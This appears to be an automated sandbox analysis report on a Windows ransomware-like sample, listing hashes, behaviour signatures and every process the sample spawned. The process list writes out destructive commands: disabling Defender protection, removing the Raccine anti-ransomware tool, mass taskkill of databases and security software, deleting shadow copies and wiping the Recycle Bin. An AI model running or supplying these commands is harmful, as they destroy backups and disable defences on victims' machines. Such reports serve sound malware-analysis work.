Analysis
-
max time kernel
130s -
max time network
144s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
28-05-2021 09:57
General
-
Target
0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
-
Size
346KB
-
MD5
aff561dee3b750728a4f2f8681cc252c
-
SHA1
f3a3ee6042c819ae00d028437c5f02ebefe0eb08
-
SHA256
0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454
-
SHA512
6b73be255c3616dedb8c5c37254729526412967e886f3aa27038dfadb268efeb048ef3099575e4214b797c6fd555e2bcddb5f6c7b890903d0c6ca3b5b948d847
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 15 IoCs
-
Windows security modification 2 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 58 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe"1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpBB92.bat2⤵
-
C:\Windows\system32\mountvol.exemountvol3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\find.exefind "}\"3⤵
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{efb60be3-9a04-11eb-be03-806e6f6e6963}\3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{efb60be4-9a04-11eb-be03-806e6f6e6963}\3⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{efb60be7-9a04-11eb-be03-806e6f6e6963}\3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Windows\bootstat.dat /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Windows\DtcInstall.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Windows\mib.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Windows\PFRO.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Windows\Professional.xml /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Windows\setupact.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Windows\setuperr.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1319854318557003316-197025906318638110641475010914-728389704452657245-1127867321"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2041150221-139216742420531062671372683766437050058-9021598481990883376-2113466463"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1654703778-11155389602389044151795034831-737151100-1693754880-416420773-862112297"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18170060234789824731790282483-18055769162055425976-650737829-10009230921335141997"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4059233541773072486-175457095655755918-230877684-21389762091547445088407668658"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-296801976-8584194691581978723-1639195226-214708343399210340-370041931-1633028954"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1825017032-314029655-1050695464-1671124340-13061068556373221-49912996442531775"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-103128349210366574347894028281824445993-1062508143-193181904220913664181450629041"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2021900841287892872-113760999916510230921170980837534828524455347386510601004"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "5986463921559380296220722059-113610604153552859792648091-185250937340686883"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1761125083170329475519035280681277835870-159683595820761129-1437285160-166953171"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1324275007754262785-1421020052-2010549880146960427610035925052003030909-592701728"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "796747103-112640587-5183849756508057593748361971453065374-1776108243153904859"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9129326561064203681220087496-655890641568894366-458022232995240479124135592"1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB